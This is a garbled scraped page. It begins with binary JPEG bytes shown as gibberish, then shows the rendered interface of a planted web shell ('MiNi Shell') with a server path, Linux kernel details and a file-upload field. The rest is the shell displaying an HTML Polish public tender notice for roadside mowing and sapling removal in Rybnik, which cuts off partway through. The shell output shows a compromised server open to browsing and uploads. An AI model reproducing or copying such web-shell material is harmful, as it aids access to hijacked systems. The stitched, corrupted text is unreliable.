JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230522/0022708101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Koszenie trawy, wycinka samosiewek z poboczy dróg, rowów i skarp na terenie Miasta Rybnika z podziałem na zadania II </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD ZIELENI MIEJSKIEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 271505514</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Pod Lasem 64</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rybnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">44-210</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL227 - Rybnicki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zzm@zielen.rybnik.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zielen.rybnik.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zarządzanie zielenią miejską i cmentarzami </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Koszenie trawy, wycinka samosiewek z poboczy dróg, rowów i skarp na terenie Miasta Rybnika z podziałem na zadania II </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d98609eb-f891-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00227081</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-05-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00038409/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Koszenie poboczy dróg</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d98609eb-f891-11ed-9355-06954b8c6cb9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl, epuap, zamowienia.publiczne@zielen.rybnik.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">korespondencja poprzez ESP</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.2120.10.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dwukrotne lub trzykrotne koszenie trawy w zależności od ulicy, wycinka samosiewek z poboczy dróg, rowów, skarp wraz z<br/>wygrabieniem i wywozem urobku (dotyczy również chodnika i jezdni) na terenie Miasta Rybnika. W przypadku zastosowania<br/>kosiarek mulczujących urobek może pozostać na miejscu pod warunkiem jego prawidłowego rozdrobnienia, które nie<br/>spowoduje powstawania warstwy przykrywającej trawę i powodującej rozwój pleśni oraz jej żółknięcia(nie dotyczy jezdni i<br/>rowów)<br/>Wykonawca zobowiązany jest do zagospodarowania bioodpadów w instalacji do tego dedykowanej i posiadającej<br/>odpowiednie moce przerobowe. Wybór przedmiotowej instalacji powinien uwzględniać zasadę bliskości i efektywności.<br/>Wykonawca, który zamierza prowadzić przetwarzanie odpadów we własnym zakresie jest zobowiązany do posiadania<br/>zezwolenia na przetwarzanie odpadów (odzyskiwanie lub unieszkodliwianie), o którym mowa w art. 41.ust.1 Ustawy o<br/>odpadach. W przypadku, gdy Wykonawca zamierza przekazać odpady innemu podmiotowi w celu ich przetworzenia,<br/>powinien zawrzeć umowę z podmiotem posiadającym odpowiednie zezwolenie w tym zakresie.<br/>Ze względu na jednakowy porost trawy zadania będą zlecane jednocześnie. Koszenie należy wykonywać w taki sposób, aby<br/>powierzchnia całej połaci trawy była równej wysokości. Czas od rozpoczęcia koszenia trawy na konkretnym odcinku drogi<br/>do jego zakończenia powinien być maksymalnie skrócony tj. dokoszenie drobnych fragmentów, które nie mogą być<br/>skoszone inaczej niż ręcznie musi być wykonane natychmiast po przejeździe sprzętu, nie później niż 24 godziny od<br/>zakończenia koszenia konkretnego odcinka drogi, natomiast wygrabienie i wywóz urobku z terenu skoszonego nie później<br/>niż 48 godzin od zakończenia koszenia. Wymagane jest na tyle staranne wykoszenie, by po zakończeniu prac nie były<br/>widoczne granice poszczególnych przejazdów sprzętu (w postaci wąskich pasów z wyrośniętą trawą). Zaleganie urobku<br/>przeznaczonego do wygrabienia i wywiezienia oraz niewykoszenie i pozostawienie fragmentów nieskoszonych jest<br/>niedopuszczalne powyżej określonego czasu.<br/>Podczas koszenia w obrębie drzew i krzewów należy ze szczególną ostrożnością kierować sprzętem w taki sposób, by nie<br/>spowodować uszkodzenia opalikowania, uszkodzeń pni drzew, koron drzew oraz krzewów. Każdorazowe uszkodzenie pni<br/>drzew skutkować będzie koniecznością wykonania przez Wykonawcę obsadzeń rekompensujących – zamiennych o<br/>parametrach tożsamych z parametrami uszkodzonego drzewa. To samo dotyczy palików. W przypadku krzewów wymiana<br/>roślin na nowe wymagana będzie przy uszkodzeniu min. 25% pędów krzewu.<br/>Wykonawca ponosi pełną odpowiedzialność za wszelkie ewentualne wypadki i szkody powstałe w wyniku realizacji<br/>przedmiotu umowy. Szkody nieuznane przez ubezpieczyciela Wykonawcy, powstałe z przyczyn niewłaściwego<br/>zabezpieczenia i realizowania usługi obciążą Wykonawcę. Wykonawca zobowiązany jest do prowadzenia robót przy<br/>nieprzerwanym ruchu ulicznym, zabezpieczenia terenu na czas prowadzonych prac, zapewnienia bezpieczeństwa<br/>uczestnikom ruchu w czasie ich trwania, oznakowania prac zgodnie z Rozporządzeniem Ministra Infrastruktury oraz Spraw<br/>Wewnętrznych i Administracji z dnia 31 lipca 2002 r. w sprawie znaków i sygnałów drogowych oraz do prowadzenia prac w<br/>sposób ograniczający do minimum utrudnienia w ruchu.<br/>Ewentualne zabrudzenia jezdni, chodników, ścieżek rowerowych, opasek przyjezdniowych urobkiem musi być usunięte<br/>niezwłocznie, najpóźniej na koniec dnia pracy.<br/>Wykonawca ma obowiązek przygotowania terenu przed rozpoczęciem prac, tak aby usługa przebiegała w sposób<br/>bezkolizyjny dla ludzi i sprzętu.<br/>Niedopuszczalne jest koszenie terenu, na którym występują śmieci i rozdrabnianie ich podczas koszenia prowadzące do<br/>dodatkowego zaśmiecanie terenu.<br/>Zgodnie z definicją „wytwórcy odpadów”, zawartą w art. 3 ust. 1 pkt 32 ustawy z dnia 14 grudnia 2012 r. o odpadach (tj.: Dz.<br/>U.2020, poz.797, j.t., ze zm), Wykonawca świadczący przedmiotową usługę (której opis zawarto powyżej), w świetle<br/>przywołanego przepisu będzie wytwórcą odpadów, powstających podczas pielęgnacji terenów zieleni, zobowiązanym do ich<br/>zagospodarowania w sposób zgodny z postanowieniami cyt. Ustawy, nie natomiast odbierającym odpady od właścicieli<br/>nieruchomości zgodnie z ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (tj.: Dz.U. 2020,<br/>poz.1439). Tym samym wykonawca zajmujący się pielęgnacją terenów zielonych, będący wytwórcą odpadów i<br/>nieprowadzący działalności w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości nie jest zobowiązany<br/>do uzyskania wpisu do rejestru działalności regulowanej, o którym mowa w art. 9c ustawy o utrzymaniu czystości i porządku<br/>w gminach, a tym samym nie jest zobowiązany do spełnienia wymogów wynikających z rozporządzenia Ministra Środowiska<br/>z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli<br/>nieruchomości. Wykonawca zobowiązany jest do dnia odbioru przekazać Zamawiającemu dowód gospodarowania<br/>odpadami zgodnie z obowiązującymi przepisami prawa (wymienionymi powyżej) w postaci kserokopii karty przekazania<br/>odpadów. Dostarczenie kserokopii karty przekazania odpadu Zamawiającemu jest warunkiem niezbędnym do dokonania<br/>odbioru prac, a brak karty w dniu odbioru traktowany będzie jako opóźnienie w wykonaniu prac oraz będzie podstawą do<br/>naliczenia kary umownej. Jeśli na karcie przekazania odpadu umieszczono odpady pochodzące nie tylko z pasa<br/>drogowego, należy opisać kartę wskazując: ilość odpadów z pasa drogowego oraz z konkretnej umowy, drogi.<br/>Podane niżej ilości powierzchni do skoszenia są orientacyjne i mogą odbiegać od faktycznych powierzchni terenu<br/>wynikających z map z uwagi na ukształtowanie i rodzaj terenu. Powierzchnie samosiewek do wycinki nie przekraczają 5%<br/>powierzchni do skoszenia. Wykonawca zobowiązany będzie do wykonania usługi na całym terenie przedstawionym na<br/>załączniku mapowym dla poszczególnego zadania.<br/>Zadanie 1.<br/>Ulica Boguszowicka obejmuje odcinek rozpoczynający się od skrzyżowania z ulicą Żorską do skrzyżowania z ulicą<br/>Gotartowicką.<br/>Orientacyjna powierzchnia terenów do koszenia – 12 000 m².<br/>Ulica Żorska obejmuje odcinek od ronda „Boguszowickiego” (skrzyżowanie ulic: Prosta i Boguszowicka) do końca granic<br/>miasta w kierunku Żor.<br/>Orientacyjna powierzchnia terenu do koszenia – 31 100 m2.<br/>Koszenie nie obejmuje wysp rond.<br/>Ulica Prosta obejmuje odcinek rozpoczynający się od ronda „Meksyk” (skrzyżowanie ulic: Prosta i Harcerska) do ronda<br/>„Boguszowickie” (skrzyżowanie ulic: Prosta i Boguszowicka) włączając łącznik pomiędzy ul. Świerklańską i ul. Prostą.<br/>Orientacyjna powierzchnia terenów do koszenia – 28 700 m².<br/>Prace nie obejmują znajdujących się na tym odcinku wysp rond.<br/>Ulica Kaktusowa obejmująca odcinek rozpoczynający się od ronda &#34;Meksyk&#34; (ul. Prosta) do ronda &#34;Kozie Góry&#34; (ul.<br/>Świerklańska).<br/>Orientacyjna powierzchnia terenów do koszenia – 2 700 m².<br/>Prace nie obejmują znajdujących się na tym odcinku wysp rond.<br/>Na poszczególnych odcinkach mogą znajdować się następujące elementy infrastruktury drogowej: chodniki, latarnie, znaki<br/>drogowe.<br/>Koszenie, wycinka samosiewek obejmować ma następujące obszary:<br/>- pobocza – w miejscach, gdzie znajdują się zabudowania, koszenie, wycinka samosiewek do ogrodzenia posesji,<br/>w miejscach niezabudowanych - do 2 metrów<br/>- pobocza za chodnikami – w miejscach, gdzie znajdują się zabudowania, koszenie, wycinka samosiewek do ogrodzenia<br/>posesji, w miejscach niezabudowanych - do 2 metrów za chodnik<br/>- pobocza za barierkami ochronnymi.<br/>- rowy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m za rowem),<br/>- skarpy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m na skarpie)<br/>UWAGA:<br/>Wykonawca winien zapoznać się z terenami, na których ma być wykonana usługa, dokonując wizji lokalnej w terenie bądź<br/>zapoznając się z załącznikami mapowymi. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 45768,15 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77314100-5 - Usługi w zakresie trawników</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dyspozycyjność</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest trzykrotne koszenie lub trzykrotne koszenie trawy, wycinka samosiewek z poboczy dróg, rowów, skarp wraz z wygrabieniem i wywozem urobku (dotyczy również chodnika i jezdni) na terenie Miasta Rybnika. W przypadku zastosowania kosiarek mulczujących urobek może pozostać na miejscu pod warunkiem jego prawidłowego rozdrobnienia, które nie spowoduje powstawania warstwy przykrywającej trawę i powodującej rozwój pleśni oraz jej żółknięcia (nie dotyczy jezdni i rowów)<br/>Zadanie 2.<br/>Ulica Gliwicka obejmuje odcinek rozpoczynający się od skrzyżowania z ulicą Obwiednia Północna do skrzyżowania z ulicą<br/>Młynek.<br/>Orientacyjna powierzchnia terenów do koszenia – 28 800 m².<br/>Ulica Rybnicka obejmuje odcinek rozpoczynający się od skrzyżowania z ulicą Młynek do końca granic miasta w kierunku<br/>Gliwic.<br/>Orientacyjna powierzchnia terenów do koszenia – 24 000 m².<br/>Na poszczególnych odcinkach mogą znajdować się następujące elementy infrastruktury drogowej: chodniki, latarnie, znaki<br/>drogowe.<br/>Koszenie, wycinka samosiewek obejmować ma następujące obszary:<br/>- pobocza – w miejscach, gdzie znajdują się zabudowania, koszenie, wycinka samosiewek do ogrodzenia posesji,<br/>w miejscach niezabudowanych - do 2 metrów<br/>- pobocza za chodnikami – w miejscach, gdzie znajdują się zabudowania, koszenie, wycinka samosiewek do ogrodzenia<br/>posesji, w miejscach niezabudowanych - do 2 metrów za chodnik<br/>- pobocza za barierkami ochronnymi.<br/>- rowy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m za rowem),<br/>- skarpy w całości, również za chodnikiem i barierkami ochronnymi (włączając 1 m na skarpie) </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 40186,67 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77314100-5 - Usługi w zakresie trawników</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dyspozycyjność</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia trzykrotne koszenie koszenie trawy, wycinka samosiewek z poboczy dróg, rowów, skarp wraz z wygrabieniem i wywozem urobku (dotyczy również chodnika i jezdni) na terenie Miasta Rybnika. W przypadku zastosowania kosiarek mulczujących urobek może pozostać na miejscu pod warunkiem jego prawidłowego rozdrobnienia, które nie spowoduje powstawania warstwy przykrywającej trawę i powodującej rozwój pleśni oraz jej żółknięcia (nie dotyczy jezdni i rowów)<br/>Zadanie 3.<br/>Ulica Małachowskiego obejmuje odcinek rozpoczynający się od skrzyżowania z ulicą Rajską do ulicy Jastrzębskiej (przejazd kolejowy)<br/>Orientacyjna powierzchnia terenu do koszenia – 6 100 m2.<br/>Ulica Przez Zwał obejmuje odcinek od skrzyżowania ulic Tkoczów z Kolberga do skrzyżowania z ulicą Małachowskiego. <br/>Orientacyjna powierzchnia terenu do koszenia – 31 000 m2.<br/>Ulica Tkoczów obejmuje odcinek od skrzyżowania ulic Tkoczów z Brzeziny Miejskie do skrzyżowania ulic Kolberga z Przez zwał. <br/>Orientacyjna powierzchnia terenu do koszenia – 10 780 m2. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 36442,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77314100-5 - Usługi w zakresie trawników</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">dyspozycyjność</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dwukrotne i trzykrotne koszenie trawy, wycinka samosiewek z poboczy dróg, rowów, skarp wraz z wygrabieniem i wywozem urobku (dotyczy również chodnika i jezdni) na terenie Miasta Rybnika. W przypadku zastosowania kosiarek mulczujących urobek może pozostać na miejscu pod warunkiem jego prawidłowego rozdrobnienia, które nie spowoduje powstawania warstwy 